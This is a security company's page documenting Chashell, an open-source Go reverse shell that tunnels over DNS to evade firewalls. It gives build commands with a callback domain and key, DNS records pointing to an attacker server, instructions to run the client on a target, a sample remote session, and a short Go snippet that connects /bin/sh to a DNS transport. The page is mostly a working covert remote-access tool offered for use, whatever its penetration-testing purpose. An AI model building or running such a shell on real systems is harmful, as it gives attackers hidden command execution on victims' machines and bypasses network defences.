• CENTRE D’URGENCE | 24/7
  • Vous êtes victime d’une cyberattaque ?
  • Contactez notre centre d’urgence cyber :
  • +33 (0)1 83 07 00 06

Chashell, a reverse shell over DNS

Chashell is a Go reverse shell that communicates over DNS. It can be used to bypass firewalls or tightly restricted networks.

Chashell is a Go reverse shell that communicates over DNS.
It can be used to bypass firewalls or tightly restricted networks.

It comes with a multi-client control server, named chaserv.

The source code can be found at https://github.com/sysdream/chashell

Communication security

Every packet is encrypted using symmetric cryptography (XSalsa20 + Poly1305), with a shared key between the client
and the server.

We plan to implement asymmetric cryptography in the future.

Protocol

Chashell communicates using Protocol Buffers serialized messages. For reference, the Protocol Buffers structure (.proto file) is available in the proto folder.

Here is a (simplified) communication chart :

Keep in mind that every packet is encrypted, hex-encoded and then packed for DNS transportation.

Supported systems

Chashell should work with any desktop system (Windows, Linux, Darwin, BSD variants) that is supported by the Go compiler.

We tested those systems and it works without issues :

  • Windows (386/amd64)
  • Linux (386/amd64/arm64)
  • OS X (386/amd64)

How to use Chaserv/Chashell

You can get it on github.

Building

Make sure the GOPATH environment variable is correctly configured before running these commands.

Build all the binaries (adjust the domain_name and the encryption_key to your needs):

$ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.sysdream.com
$ make build-all

Build for a specific platform:

$ make build-all OSARCH="linux/arm"

Build only the server:

$ make build-server

Build only the client (chashell itself):

$ make build-client

DNS Settings

  • Buy and configure a domain name of your choice (preferably short).
  • Set a DNS record like this :
chashell 300 IN A [SERVERIP]
c 300 IN NS chashell.[DOMAIN].

Usage

Basically, on the server side (attacker’s computer), you must use the chaserv binary. For the client side (i.e the target), use the chashell binary.

So:

  • Run chaserv on the control server.
  • Run chashell on the target computer.

The client should now connect back to chaserv:

[n.chatelain]$ sudo ./chaserv
chashell >>> New session : 5c54404419e59881dfa3a757
chashell >>> sessions 5c54404419e59881dfa3a757
Interacting with session 5c54404419e59881dfa3a757.
whoami
n.chatelain
ls /
bin
boot
dev
[...]
usr
var

Use the sessions [sessionid] command to interact with a client.
When interacting with a session, you can use the background session in order to return to the chashell prompt.

Use the exit command to close chaserv.

Implement your own

The chashell/lib/transport library is compatible with the io.Reader / io.Writer interface. So, implementing a reverse shell is as easy as :

cmd := exec.Command("/bin/sh")

dnsTransport := transport.DNSStream(targetDomain, encryptionKey)

cmd.Stdout = dnsTransport
cmd.Stderr = dnsTransport
cmd.Stdin = dnsTransport
cmd.Run()

Debugging

For more verbose messages, add TAGS=debug at the end of the make command.

To Do

  • Implement asymmetric cryptography (Curve25519, XSalsa20 and Poly1305)
  • Retrieve the host name using the InfoPacket message.
  • Create a proxy/relay tool in order to tunnel TCP/UDP streams (Meterpreter over DNS !).
  • Better error handling.
  • Get rid of dependencies.

Credits

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>